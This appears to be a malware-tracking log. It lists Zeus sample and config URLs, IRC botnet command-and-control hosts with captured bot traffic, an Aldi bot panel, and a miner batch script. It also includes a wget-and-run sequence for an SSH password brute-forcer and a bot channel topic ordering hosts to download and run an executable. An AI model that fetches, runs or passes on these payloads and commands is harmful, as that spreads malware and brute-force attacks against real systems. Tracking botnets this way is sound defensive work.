zeus sample here http://zxz666.darktech.org/zeus/builder/bot.exe zeus config file here http://zxz666.darktech.org/zeus/builder/cfg2.bin when u open zxz666.darktech.org u are redirected to vkontakte.ru wich ask for login maybe masking atempt or vkontakte.ru is now used to control zeus bots zeus samples just in case they get deleted by the hecker hosting infos: http://whois.domaintools.com/93.80.96.91
174.59.20.100(irc botnet hosted in United States Tunkhannock Comcast Cable Communications Inc)
Remote Host Port Number 174.59.20.100 4244 JOIN #vnc# d34th PRIVMSG #vnc# : 14,1.:[ 15,1rAGEBoT 14,1]:. 15,1 range: 59.x.x.x with 94 threads. (autorooting) PONG irc.undernet.org hosting infos: http://whois.domaintools.com/174.59.20.100
216.246.124.44(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 216.246.124.44 2345 NICK New[USA|00|P|41019] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-6548 * 0 :COMPUTERNAME MODE New[USA|00|P|41019] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/216.246.124.44
tool.manitam.com(irc botnet hosted in United Kingdom Redstation Limited)
Resolved : [tool.manitam.com] To [176.227.199.27] 176.227.199.27:6669 Nick: AUT|0846719 Username: ecyccmpo Joined Channel: #ddos with Password zz hosting infos: http://whois.domaintools.com/176.227.199.27
a.trading-network.to(Aldi bot hosted in Seychelles Ideal Solution Ltd)
Panel here: a.trading-network.to/aldi/ samples here hosting infos: http://whois.domaintools.com/193.107.19.150
173.163.245.113(irc botnet hosted in United States Albuquerque Comcast Business Communications Llc)
C&C Server: 173.163.245.113:9090 Server Password: Username: MEAT Nickname: {iNF-00-DEU-XP-DELL-3588} Channel: ##hxxp## (Password: ) Channeltopic: :.http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c Now talking in ##hxxp## Topic On: [ ##hxxp## ] [ .http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c ] Topic 11 By 12: [ pe[ro ] hosting infos: http://whois.domaintools.com/173.163.245.113
ssh bruter from romanian hecker(hosted in home.ro)
Linux ssh password bruter from romanian heckers wget vladidas.home.ro/dup1.tgz tar xzvf dup1.tgz cd dup chmod +x * ./screen ./start 12 Download
119.59.99.52(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number 119.59.99.52 2345 NICK New[USA|00|P|33843] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-7233 * 0 :COMPUTERNAME MODE New[USA|00|P|33843] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/119.59.99.52
sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)
Resolved : [sfx.dload.asia] To [176.9.42.247] Resolved : [sfx.dload.asia] To [188.40.92.153] Resolved : [sfx.dload.asia] To [188.40.93.82] yz.bat: ping -n 2 127.0.0.1 taskkill /f /im svchoost.exe taskkill /f /im mamita.exe taskkill /f /im x11811.exe taskkill /f /im Winlogon2.exe x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2 file downloaded after login: http://sfx.dload.asia:8332/ -uRead more...
111.90.139.39(irc botnet hosted in Malaysia Johor Bahru Piradius Net)
Remote Host Port Number 111.90.139.39 1866 NICK n[USA|XP|COMPUTERNAME]fwkcgcf USER hh “” “lol” :hh JOIN #!h! PONG 422 hosting infos: http://whois.domaintools.com/111.90.139.39